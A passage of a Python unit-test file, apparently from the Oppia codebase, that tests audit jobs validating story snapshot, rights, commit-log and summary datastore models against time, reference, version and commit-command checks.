        self.model_instance_0.commit_cmds = [{
            'cmd': 'add_story_node'
        }, {
            'cmd': 'delete_story_node',
            'invalid_attribute': 'invalid'
        }]
        self.model_instance_0.put()
        expected_output = [
            (
                u'[u\'failed validation check for commit cmd '
                'delete_story_node check of '
                'StorySnapshotMetadataModel\', '
                '[u"Entity id 0-1: Commit command domain validation '
                'for command: {u\'cmd\': u\'delete_story_node\', '
                'u\'invalid_attribute\': u\'invalid\'} failed with error: '
                'The following required attributes are missing: '
                'node_id, The following extra attributes are present: '
                'invalid_attribute"]]'
            ), (
                u'[u\'failed validation check for commit cmd add_story_node '
                'check of StorySnapshotMetadataModel\', '
                '[u"Entity id 0-1: Commit command domain validation '
                'for command: {u\'cmd\': u\'add_story_node\'} '
                'failed with error: The following required attributes '
                'are missing: node_id, title"]]'
            ), u'[u\'fully-validated StorySnapshotMetadataModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
class StorySnapshotContentModelValidatorTests(test_utils.GenericTestBase):
    """Tests for the StorySnapshotContentModel audit one-off job."""

    def setUp(self):
        """Creates three stories and stores their version-1 snapshot
        content models plus the audit job class.
        """
        super(StorySnapshotContentModelValidatorTests, self).setUp()
        self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
        self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
        topic = topic_domain.Topic.create_default_topic(
            topic_id='0', name='topic')
        stories = [story_domain.Story.create_default_story(
            '%s' % i,
            title='title %d' % i,
            corresponding_topic_id='0'
        ) for i in xrange(3)]
        for story in stories:
            story_services.save_new_story(self.owner_id, story)
            topic.add_canonical_story(story.id)
        topic_services.save_new_topic(self.owner_id, topic)
        self.model_instance_0 = (
            story_models.StorySnapshotContentModel.get_by_id(
                '0-1'))
        self.model_instance_1 = (
            story_models.StorySnapshotContentModel.get_by_id(
                '1-1'))
        self.model_instance_2 = (
            story_models.StorySnapshotContentModel.get_by_id(
                '2-1'))
        self.job_class = (
            prod_validation_jobs_one_off
            .StorySnapshotContentModelAuditOneOffJob)

    def test_standard_operation(self):
        """Checks that snapshot content for a valid extra commit validates
        fully.
        """
        story_services.update_story(
            self.owner_id, '0', [story_domain.StoryChange({
                'cmd': 'update_story_property',
                'property_name': 'title',
                'new_value': 'New title',
                'old_value': 'title 0'
            })], 'Changes.')
        expected_output = [
            u'[u\'fully-validated StorySnapshotContentModel\', 4]']
        run_job_and_check_output(self, expected_output)

    def test_model_with_created_on_greater_than_last_updated(self):
        """Checks the time-field relation check for created_on fields set
        after last_updated.
        """
        self.model_instance_0.created_on = (
            self.model_instance_0.last_updated + datetime.timedelta(days=1))
        self.model_instance_0.put()
        expected_output = [(
            u'[u\'failed validation check for time field relation check '
            'of StorySnapshotContentModel\', '
            '[u\'Entity id %s: The created_on field has a value '
            '%s which is greater than the value '
            '%s of last_updated field\']]') % (
                self.model_instance_0.id,
                self.model_instance_0.created_on,
                self.model_instance_0.last_updated
            ), (
                u'[u\'fully-validated '
                'StorySnapshotContentModel\', 2]')]
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_last_updated_greater_than_current_time(self):
        """Checks that a last_updated value in the (mocked) future is
        reported by the current-time check.
        """
        self.model_instance_1.delete()
        self.model_instance_2.delete()
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'StorySnapshotContentModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_story_model_failure(self):
        """Checks the story_ids external-reference check when the parent
        story model has been deleted.
        """
        story_models.StoryModel.get_by_id('0').delete(self.owner_id, '', [])
        expected_output = [
            (
                u'[u\'failed validation check for story_ids '
                'field check of StorySnapshotContentModel\', '
                '[u"Entity id 0-1: based on field story_ids '
                'having value 0, expect model StoryModel with '
                'id 0 but it doesn\'t exist", u"Entity id 0-2: based on field '
                'story_ids having value 0, expect model '
                'StoryModel with id 0 but it doesn\'t exist"]]'
            ), (
                u'[u\'fully-validated '
                'StorySnapshotContentModel\', 2]')]
        run_job_and_check_output(self, expected_output, sort=True)

    def test_invalid_story_version_in_model_id(self):
        """Checks that a snapshot content model whose id encodes a version
        greater than the story model's version is reported.
        """
        model_with_invalid_version_in_id = (
            story_models.StorySnapshotContentModel(
                id='0-3'))
        model_with_invalid_version_in_id.content = {}
        model_with_invalid_version_in_id.put()
        expected_output = [
            (
                u'[u\'failed validation check for story model '
                'version check of StorySnapshotContentModel\', '
                '[u\'Entity id 0-3: Story model corresponding to '
                'id 0 has a version 1 which is less than '
                'the version 3 in snapshot content model id\']]'
            ), (
                u'[u\'fully-validated StorySnapshotContentModel\', '
                '3]')]
        run_job_and_check_output(self, expected_output, sort=True)
class StoryRightsModelValidatorTests(test_utils.GenericTestBase):
    """Tests for the StoryRightsModel audit one-off job."""

    def setUp(self):
        """Creates three stories under a topic, assigns two topic managers
        as story managers, and stores the rights model instances plus the
        audit job class.
        """
        super(StoryRightsModelValidatorTests, self).setUp()
        self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
        self.signup(self.ADMIN_EMAIL, self.ADMIN_USERNAME)
        self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
        self.admin_id = self.get_user_id_from_email(self.ADMIN_EMAIL)
        self.set_admins([self.ADMIN_USERNAME])
        self.admin = user_services.UserActionsInfo(self.admin_id)
        manager1_email = 'user@manager1.com'
        manager2_email = 'user@manager2.com'
        self.signup(manager1_email, 'manager1')
        self.signup(manager2_email, 'manager2')
        self.set_topic_managers(['manager1', 'manager2'])
        self.manager1_id = self.get_user_id_from_email(manager1_email)
        self.manager2_id = self.get_user_id_from_email(manager2_email)
        self.manager1 = user_services.UserActionsInfo(self.manager1_id)
        self.manager2 = user_services.UserActionsInfo(self.manager2_id)
        topic = topic_domain.Topic.create_default_topic(
            topic_id='0', name='topic')
        stories = [story_domain.Story.create_default_story(
            '%s' % i,
            title='title %d' % i,
            corresponding_topic_id='0'
        ) for i in xrange(3)]
        for story in stories:
            story_services.save_new_story(self.owner_id, story)
            topic.add_canonical_story(story.id)
        topic_services.save_new_topic(self.owner_id, topic)
        # Story '0' gets two managers, story '1' one, story '2' none.
        story_services.assign_role(
            self.admin, self.manager1, story_domain.ROLE_MANAGER, stories[0].id)
        story_services.assign_role(
            self.admin, self.manager2, story_domain.ROLE_MANAGER, stories[0].id)
        story_services.assign_role(
            self.admin, self.manager2, story_domain.ROLE_MANAGER, stories[1].id)
        self.model_instance_0 = story_models.StoryRightsModel.get_by_id('0')
        self.model_instance_1 = story_models.StoryRightsModel.get_by_id('1')
        self.model_instance_2 = story_models.StoryRightsModel.get_by_id('2')
        self.job_class = (
            prod_validation_jobs_one_off.StoryRightsModelAuditOneOffJob)

    def test_standard_operation(self):
        """Checks that untouched story rights models validate fully."""
        expected_output = [
            u'[u\'fully-validated StoryRightsModel\', 3]']
        run_job_and_check_output(self, expected_output)

    def test_model_with_created_on_greater_than_last_updated(self):
        """Checks the time-field relation check for created_on fields set
        after last_updated.
        """
        self.model_instance_0.created_on = (
            self.model_instance_0.last_updated + datetime.timedelta(days=1))
        self.model_instance_0.commit(
            feconf.SYSTEM_COMMITTER_ID, 'created_on test', [])
        expected_output = [(
            u'[u\'failed validation check for time field relation check '
            'of StoryRightsModel\', '
            '[u\'Entity id %s: The created_on field has a value '
            '%s which is greater than the value '
            '%s of last_updated field\']]') % (
                self.model_instance_0.id,
                self.model_instance_0.created_on,
                self.model_instance_0.last_updated
            ), u'[u\'fully-validated StoryRightsModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_last_updated_greater_than_current_time(self):
        """Checks that a last_updated value in the (mocked) future is
        reported by the current-time check.
        """
        self.model_instance_1.delete(feconf.SYSTEM_COMMITTER_ID, 'delete')
        self.model_instance_2.delete(feconf.SYSTEM_COMMITTER_ID, 'delete')
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'StoryRightsModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_story_model_failure(self):
        """Checks the story_ids external-reference check when the parent
        story model has been deleted.
        """
        story_models.StoryModel.get_by_id('0').delete(
            feconf.SYSTEM_COMMITTER_ID, '', [])
        expected_output = [
            (
                u'[u\'failed validation check for story_ids '
                'field check of StoryRightsModel\', '
                '[u"Entity id 0: based on field story_ids having '
                'value 0, expect model StoryModel with id 0 but '
                'it doesn\'t exist"]]'),
            u'[u\'fully-validated StoryRightsModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_manager_user_model_failure(self):
        """Checks the manager_user_ids external-reference check when a
        manager's user settings model has been deleted.
        """
        user_models.UserSettingsModel.get_by_id(self.manager1_id).delete()
        expected_output = [
            (
                u'[u\'failed validation check for manager_user_ids '
                'field check of StoryRightsModel\', '
                '[u"Entity id 0: based on field manager_user_ids having '
                'value %s, expect model UserSettingsModel with id %s '
                'but it doesn\'t exist"]]') % (
                    self.manager1_id, self.manager1_id),
            u'[u\'fully-validated StoryRightsModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_snapshot_metadata_model_failure(self):
        """Checks the snapshot_metadata_ids external-reference check when
        the rights snapshot metadata model has been deleted.
        """
        story_models.StoryRightsSnapshotMetadataModel.get_by_id(
            '0-1').delete()
        expected_output = [
            (
                u'[u\'failed validation check for snapshot_metadata_ids '
                'field check of StoryRightsModel\', '
                '[u"Entity id 0: based on field snapshot_metadata_ids having '
                'value 0-1, expect model '
                'StoryRightsSnapshotMetadataModel '
                'with id 0-1 but it doesn\'t exist"]]'
            ),
            u'[u\'fully-validated StoryRightsModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_snapshot_content_model_failure(self):
        """Checks the snapshot_content_ids external-reference check when
        the rights snapshot content model has been deleted.
        """
        story_models.StoryRightsSnapshotContentModel.get_by_id(
            '0-1').delete()
        expected_output = [
            (
                u'[u\'failed validation check for snapshot_content_ids '
                'field check of StoryRightsModel\', '
                '[u"Entity id 0: based on field snapshot_content_ids having '
                'value 0-1, expect model StoryRightsSnapshotContentModel '
                'with id 0-1 but it doesn\'t exist"]]'),
            u'[u\'fully-validated StoryRightsModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
class StoryRightsSnapshotMetadataModelValidatorTests(
        test_utils.GenericTestBase):
    """Tests for the StoryRightsSnapshotMetadataModel audit one-off job."""

    def setUp(self):
        """Creates a topic with three stories; story '0' is saved by a
        secondary user so its snapshot metadata has a distinct committer.
        """
        super(StoryRightsSnapshotMetadataModelValidatorTests, self).setUp(
            )
        self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
        self.signup(USER_EMAIL, USER_NAME)
        self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
        self.user_id = self.get_user_id_from_email(USER_EMAIL)
        topic = topic_domain.Topic.create_default_topic(
            topic_id='0', name='topic')
        stories = [story_domain.Story.create_default_story(
            '%s' % i,
            title='title %d' % i,
            corresponding_topic_id='0'
        ) for i in xrange(3)]
        for story in stories:
            if story.id != '0':
                story_services.save_new_story(self.owner_id, story)
            else:
                story_services.save_new_story(self.user_id, story)
            topic.add_canonical_story(story.id)
        topic_services.save_new_topic(self.owner_id, topic)
        self.model_instance_0 = (
            story_models.StoryRightsSnapshotMetadataModel.get_by_id(
                '0-1'))
        self.model_instance_1 = (
            story_models.StoryRightsSnapshotMetadataModel.get_by_id(
                '1-1'))
        self.model_instance_2 = (
            story_models.StoryRightsSnapshotMetadataModel.get_by_id(
                '2-1'))
        self.job_class = (
            prod_validation_jobs_one_off
            .StoryRightsSnapshotMetadataModelAuditOneOffJob)

    def test_standard_operation(self):
        """All three snapshot metadata models validate cleanly."""
        expected_output = [
            u'[u\'fully-validated StoryRightsSnapshotMetadataModel\', 3]']
        run_job_and_check_output(self, expected_output)

    def test_model_with_created_on_greater_than_last_updated(self):
        """created_on later than last_updated fails the time relation
        check.
        """
        self.model_instance_0.created_on = (
            self.model_instance_0.last_updated + datetime.timedelta(days=1))
        self.model_instance_0.put()
        expected_output = [(
            u'[u\'failed validation check for time field relation check '
            'of StoryRightsSnapshotMetadataModel\', '
            '[u\'Entity id %s: The created_on field has a value '
            '%s which is greater than the value '
            '%s of last_updated field\']]') % (
                self.model_instance_0.id,
                self.model_instance_0.created_on,
                self.model_instance_0.last_updated
            ), (
                u'[u\'fully-validated '
                'StoryRightsSnapshotMetadataModel\', 2]')]
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_last_updated_greater_than_current_time(self):
        """last_updated in the future (via the mocked clock) fails the
        current time check.
        """
        self.model_instance_1.delete()
        self.model_instance_2.delete()
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'StoryRightsSnapshotMetadataModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_story_rights_model_failure(self):
        """Deleting the parent rights model fails the story_rights_ids
        check for both snapshot versions.
        """
        story_models.StoryRightsModel.get_by_id('0').delete(
            self.user_id, '', [])
        expected_output = [
            (
                u'[u\'failed validation check for story_rights_ids '
                'field check of StoryRightsSnapshotMetadataModel\', '
                '[u"Entity id 0-1: based on field story_rights_ids '
                'having value 0, expect model StoryRightsModel with '
                'id 0 but it doesn\'t exist", u"Entity id 0-2: based on field '
                'story_rights_ids having value 0, expect model '
                'StoryRightsModel with id 0 but it doesn\'t exist"]]'
            ), (
                u'[u\'fully-validated '
                'StoryRightsSnapshotMetadataModel\', 2]')]
        run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_committer_model_failure(self):
        """Deleting the committer's settings model fails the
        committer_ids check.
        """
        user_models.UserSettingsModel.get_by_id(self.user_id).delete()
        expected_output = [
            (
                u'[u\'failed validation check for committer_ids field '
                'check of StoryRightsSnapshotMetadataModel\', '
                '[u"Entity id 0-1: based on field committer_ids having '
                'value %s, expect model UserSettingsModel with id %s '
                'but it doesn\'t exist"]]'
            ) % (self.user_id, self.user_id), (
                u'[u\'fully-validated '
                'StoryRightsSnapshotMetadataModel\', 2]')]
        run_job_and_check_output(self, expected_output, sort=True)

    def test_invalid_story_version_in_model_id(self):
        """A snapshot id whose version exceeds the rights model's version
        fails the version check.
        """
        model_with_invalid_version_in_id = (
            story_models.StoryRightsSnapshotMetadataModel(
                id='0-3', committer_id=self.owner_id, commit_type='edit',
                commit_message='msg', commit_cmds=[{}]))
        model_with_invalid_version_in_id.put()
        expected_output = [
            (
                u'[u\'failed validation check for story rights model '
                'version check of StoryRightsSnapshotMetadataModel\', '
                '[u\'Entity id 0-3: StoryRights model corresponding to '
                'id 0 has a version 1 which is less than the version 3 in '
                'snapshot metadata model id\']]'
            ), (
                u'[u\'fully-validated '
                'StoryRightsSnapshotMetadataModel\', 3]')]
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_invalid_commit_cmd_schmea(self):
        """Commit cmds with missing or extra attributes fail domain
        validation per-command.
        """
        self.model_instance_0.commit_cmds = [{
            'cmd': 'change_role',
            'assignee_id': 'id',
            'new_role': 'manager'
        }, {
            'cmd': 'publish_story',
            'invalid_attribute': 'invalid'
        }]
        self.model_instance_0.put()
        expected_output = [
            (
                u'[u\'failed validation check for commit cmd '
                'change_role check of '
                'StoryRightsSnapshotMetadataModel\', '
                '[u"Entity id 0-1: Commit command domain validation '
                'for command: {u\'assignee_id\': u\'id\', '
                'u\'cmd\': u\'change_role\', u\'new_role\': u\'manager\'} '
                'failed with error: The following required attributes '
                'are missing: old_role"]]'
            ), (
                u'[u\'failed validation check for commit cmd publish_story '
                'check of StoryRightsSnapshotMetadataModel\', '
                '[u"Entity id 0-1: Commit command domain validation '
                'for command: {u\'cmd\': u\'publish_story\', '
                'u\'invalid_attribute\': u\'invalid\'} failed with error: '
                'The following extra attributes are present: '
                'invalid_attribute"]]'
            ), u'[u\'fully-validated StoryRightsSnapshotMetadataModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
class StoryRightsSnapshotContentModelValidatorTests(
        test_utils.GenericTestBase):
    """Tests for the StoryRightsSnapshotContentModel audit one-off job."""

    def setUp(self):
        """Creates a topic with three stories so snapshot content models
        '0-1', '1-1' and '2-1' exist.
        """
        super(StoryRightsSnapshotContentModelValidatorTests, self).setUp(
            )
        self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
        self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
        topic = topic_domain.Topic.create_default_topic(
            topic_id='0', name='topic')
        stories = [story_domain.Story.create_default_story(
            '%s' % i,
            title='title %d' % i,
            corresponding_topic_id='0'
        ) for i in xrange(3)]
        for story in stories:
            story_services.save_new_story(self.owner_id, story)
            topic.add_canonical_story(story.id)
        topic_services.save_new_topic(self.owner_id, topic)
        self.model_instance_0 = (
            story_models.StoryRightsSnapshotContentModel.get_by_id(
                '0-1'))
        self.model_instance_1 = (
            story_models.StoryRightsSnapshotContentModel.get_by_id(
                '1-1'))
        self.model_instance_2 = (
            story_models.StoryRightsSnapshotContentModel.get_by_id(
                '2-1'))
        self.job_class = (
            prod_validation_jobs_one_off
            .StoryRightsSnapshotContentModelAuditOneOffJob)

    def test_standard_operation(self):
        """All three snapshot content models validate cleanly."""
        expected_output = [
            u'[u\'fully-validated StoryRightsSnapshotContentModel\', 3]']
        run_job_and_check_output(self, expected_output)

    def test_model_with_created_on_greater_than_last_updated(self):
        """created_on later than last_updated fails the time relation
        check.
        """
        self.model_instance_0.created_on = (
            self.model_instance_0.last_updated + datetime.timedelta(days=1))
        self.model_instance_0.put()
        expected_output = [(
            u'[u\'failed validation check for time field relation check '
            'of StoryRightsSnapshotContentModel\', '
            '[u\'Entity id %s: The created_on field has a value '
            '%s which is greater than the value '
            '%s of last_updated field\']]') % (
                self.model_instance_0.id,
                self.model_instance_0.created_on,
                self.model_instance_0.last_updated
            ), (
                u'[u\'fully-validated '
                'StoryRightsSnapshotContentModel\', 2]')]
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_last_updated_greater_than_current_time(self):
        """last_updated in the future (via the mocked clock) fails the
        current time check.
        """
        self.model_instance_1.delete()
        self.model_instance_2.delete()
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'StoryRightsSnapshotContentModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_story_model_failure(self):
        """Deleting the parent rights model fails the story_rights_ids
        check for both snapshot versions.
        """
        story_models.StoryRightsModel.get_by_id('0').delete(
            self.owner_id, '', [])
        expected_output = [
            (
                u'[u\'failed validation check for story_rights_ids '
                'field check of StoryRightsSnapshotContentModel\', '
                '[u"Entity id 0-1: based on field story_rights_ids '
                'having value 0, expect model StoryRightsModel with '
                'id 0 but it doesn\'t exist", u"Entity id 0-2: based on field '
                'story_rights_ids having value 0, expect model '
                'StoryRightsModel with id 0 but it doesn\'t exist"]]'
            ), (
                u'[u\'fully-validated '
                'StoryRightsSnapshotContentModel\', 2]')]
        run_job_and_check_output(self, expected_output, sort=True)

    def test_invalid_story_version_in_model_id(self):
        """A snapshot id whose version exceeds the rights model's version
        fails the version check.
        """
        model_with_invalid_version_in_id = (
            story_models.StoryRightsSnapshotContentModel(
                id='0-3'))
        model_with_invalid_version_in_id.content = {}
        model_with_invalid_version_in_id.put()
        expected_output = [
            (
                u'[u\'failed validation check for story rights model '
                'version check of StoryRightsSnapshotContentModel\', '
                '[u\'Entity id 0-3: StoryRights model corresponding to '
                'id 0 has a version 1 which is less than the version 3 in '
                'snapshot content model id\']]'
            ), (
                u'[u\'fully-validated StoryRightsSnapshotContentModel\', '
                '3]')]
        run_job_and_check_output(self, expected_output, sort=True)
class StoryCommitLogEntryModelValidatorTests(test_utils.GenericTestBase):
    """Tests for the StoryCommitLogEntryModel audit one-off job."""

    def setUp(self):
        """Creates a topic with three stories so commit log models
        'story-0-1', 'story-1-1' and 'story-2-1' exist.
        """
        super(StoryCommitLogEntryModelValidatorTests, self).setUp()
        self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
        self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
        topic = topic_domain.Topic.create_default_topic(
            topic_id='0', name='topic')
        stories = [story_domain.Story.create_default_story(
            '%s' % i,
            title='title %d' % i,
            corresponding_topic_id='0'
        ) for i in xrange(3)]
        for story in stories:
            story_services.save_new_story(self.owner_id, story)
            topic.add_canonical_story(story.id)
        topic_services.save_new_topic(self.owner_id, topic)
        self.model_instance_0 = (
            story_models.StoryCommitLogEntryModel.get_by_id(
                'story-0-1'))
        self.model_instance_1 = (
            story_models.StoryCommitLogEntryModel.get_by_id(
                'story-1-1'))
        self.model_instance_2 = (
            story_models.StoryCommitLogEntryModel.get_by_id(
                'story-2-1'))
        self.job_class = (
            prod_validation_jobs_one_off
            .StoryCommitLogEntryModelAuditOneOffJob)

    def test_standard_operation(self):
        """An extra valid update produces a fourth fully-validated
        commit log entry.
        """
        story_services.update_story(
            self.owner_id, '0', [story_domain.StoryChange({
                'cmd': 'update_story_property',
                'property_name': 'title',
                'new_value': 'New title',
                'old_value': 'title 0'
            })], 'Changes.')
        expected_output = [
            u'[u\'fully-validated StoryCommitLogEntryModel\', 4]']
        run_job_and_check_output(self, expected_output)

    def test_model_with_created_on_greater_than_last_updated(self):
        """created_on later than last_updated fails the time relation
        check.
        """
        self.model_instance_0.created_on = (
            self.model_instance_0.last_updated + datetime.timedelta(days=1))
        self.model_instance_0.put()
        expected_output = [(
            u'[u\'failed validation check for time field relation check '
            'of StoryCommitLogEntryModel\', '
            '[u\'Entity id %s: The created_on field has a value '
            '%s which is greater than the value '
            '%s of last_updated field\']]') % (
                self.model_instance_0.id,
                self.model_instance_0.created_on,
                self.model_instance_0.last_updated
            ), u'[u\'fully-validated StoryCommitLogEntryModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_last_updated_greater_than_current_time(self):
        """last_updated in the future (via the mocked clock) fails the
        current time check.
        """
        self.model_instance_1.delete()
        self.model_instance_2.delete()
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'StoryCommitLogEntryModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_story_model_failure(self):
        """Deleting the story fails the story_ids check for both commit
        log versions.
        """
        story_models.StoryModel.get_by_id('0').delete(
            feconf.SYSTEM_COMMITTER_ID, '', [])
        expected_output = [
            (
                u'[u\'failed validation check for story_ids '
                'field check of StoryCommitLogEntryModel\', '
                '[u"Entity id story-0-1: based on field story_ids '
                'having value 0, expect model StoryModel with id 0 '
                'but it doesn\'t exist", u"Entity id story-0-2: based '
                'on field story_ids having value 0, expect model '
                'StoryModel with id 0 but it doesn\'t exist"]]'
            ), u'[u\'fully-validated StoryCommitLogEntryModel\', 2]']
        run_job_and_check_output(self, expected_output, literal_eval=True)

    def test_invalid_story_version_in_model_id(self):
        """A commit log id whose version exceeds the story version fails
        the version check.
        """
        model_with_invalid_version_in_id = (
            story_models.StoryCommitLogEntryModel.create(
                '0', 3, self.owner_id, self.OWNER_USERNAME, 'edit',
                'msg', [{}],
                constants.ACTIVITY_STATUS_PUBLIC, False))
        model_with_invalid_version_in_id.story_id = '0'
        model_with_invalid_version_in_id.put()
        expected_output = [
            (
                u'[u\'failed validation check for story model '
                'version check of StoryCommitLogEntryModel\', '
                '[u\'Entity id %s: Story model corresponding '
                'to id 0 has a version 1 which is less than '
                'the version 3 in commit log entry model id\']]'
            ) % (model_with_invalid_version_in_id.id),
            u'[u\'fully-validated StoryCommitLogEntryModel\', 3]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_invalid_id(self):
        """An id not matching the expected regex fails both the id check
        and the commit cmd lookup.
        """
        model_with_invalid_id = (
            story_models.StoryCommitLogEntryModel(
                id='invalid-0-1', user_id=self.owner_id,
                username=self.OWNER_USERNAME, commit_type='edit',
                commit_message='msg', commit_cmds=[{}],
                post_commit_status=constants.ACTIVITY_STATUS_PUBLIC,
                post_commit_is_private=False))
        model_with_invalid_id.story_id = '0'
        model_with_invalid_id.put()
        expected_output = [
            (
                u'[u\'failed validation check for model id check of '
                'StoryCommitLogEntryModel\', '
                '[u\'Entity id %s: Entity id does not match regex pattern\']]'
            ) % (model_with_invalid_id.id), (
                u'[u\'failed validation check for commit cmd check of '
                'StoryCommitLogEntryModel\', [u\'Entity id invalid-0-1: '
                'No commit command domain object defined for entity with '
                'commands: [{}]\']]'),
            u'[u\'fully-validated StoryCommitLogEntryModel\', 3]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_invalid_commit_type(self):
        """An unrecognised commit_type fails the commit type check."""
        self.model_instance_0.commit_type = 'invalid'
        self.model_instance_0.put()
        expected_output = [
            (
                u'[u\'failed validation check for commit type check of '
                'StoryCommitLogEntryModel\', '
                '[u\'Entity id story-0-1: Commit type invalid is '
                'not allowed\']]'
            ), u'[u\'fully-validated StoryCommitLogEntryModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_invalid_post_commit_status(self):
        """An unrecognised post_commit_status fails its check."""
        self.model_instance_0.post_commit_status = 'invalid'
        self.model_instance_0.put()
        expected_output = [
            (
                u'[u\'failed validation check for post commit status check '
                'of StoryCommitLogEntryModel\', '
                '[u\'Entity id story-0-1: Post commit status invalid '
                'is invalid\']]'
            ), u'[u\'fully-validated StoryCommitLogEntryModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_invalid_true_post_commit_is_private(self):
        """post_commit_is_private=True contradicts a public status."""
        self.model_instance_0.post_commit_status = 'public'
        self.model_instance_0.post_commit_is_private = True
        self.model_instance_0.put()
        expected_output = [
            (
                u'[u\'failed validation check for post commit is private '
                'check of StoryCommitLogEntryModel\', '
                '[u\'Entity id %s: Post commit status is '
                'public but post_commit_is_private is True\']]'
            ) % self.model_instance_0.id,
            u'[u\'fully-validated StoryCommitLogEntryModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_invalid_false_post_commit_is_private(self):
        """post_commit_is_private=False contradicts a private status."""
        self.model_instance_0.post_commit_status = 'private'
        self.model_instance_0.post_commit_is_private = False
        self.model_instance_0.put()
        expected_output = [
            (
                u'[u\'failed validation check for post commit is private '
                'check of StoryCommitLogEntryModel\', '
                '[u\'Entity id %s: Post commit status is '
                'private but post_commit_is_private is False\']]'
            ) % self.model_instance_0.id,
            u'[u\'fully-validated StoryCommitLogEntryModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_invalid_commit_cmd_schmea(self):
        """Commit cmds with missing or extra attributes fail domain
        validation per-command.
        """
        self.model_instance_0.commit_cmds = [{
            'cmd': 'add_story_node'
        }, {
            'cmd': 'delete_story_node',
            'invalid_attribute': 'invalid'
        }]
        self.model_instance_0.put()
        expected_output = [
            (
                u'[u\'failed validation check for commit cmd '
                'delete_story_node check of '
                'StoryCommitLogEntryModel\', '
                '[u"Entity id story-0-1: Commit command domain '
                'validation for command: {u\'cmd\': u\'delete_story_node\', '
                'u\'invalid_attribute\': u\'invalid\'} failed with error: '
                'The following required attributes are missing: node_id, '
                'The following extra attributes are present: '
                'invalid_attribute"]]'
            ), (
                u'[u\'failed validation check for commit cmd '
                'add_story_node check of StoryCommitLogEntryModel\', '
                '[u"Entity id story-0-1: Commit command domain validation '
                'for command: {u\'cmd\': u\'add_story_node\'} '
                'failed with error: The following required attributes '
                'are missing: node_id, title"]]'
            ), u'[u\'fully-validated StoryCommitLogEntryModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
class StorySummaryModelValidatorTests(test_utils.GenericTestBase):
    """Tests for the StorySummaryModel audit one-off job."""

    def setUp(self):
        """Creates three stories with distinct language codes so summary
        models '0', '1' and '2' exist.
        """
        super(StorySummaryModelValidatorTests, self).setUp()
        self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
        self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
        language_codes = ['ar', 'en', 'en']
        topic = topic_domain.Topic.create_default_topic(
            topic_id='0', name='topic')
        stories = [story_domain.Story.create_default_story(
            '%s' % i,
            title='title %d' % i,
            corresponding_topic_id='0'
        ) for i in xrange(3)]
        for index, story in enumerate(stories):
            story.description = 'story-test'
            story.language_code = language_codes[index]
            story_services.save_new_story(self.owner_id, story)
            topic.add_canonical_story(story.id)
        topic_services.save_new_topic(self.owner_id, topic)
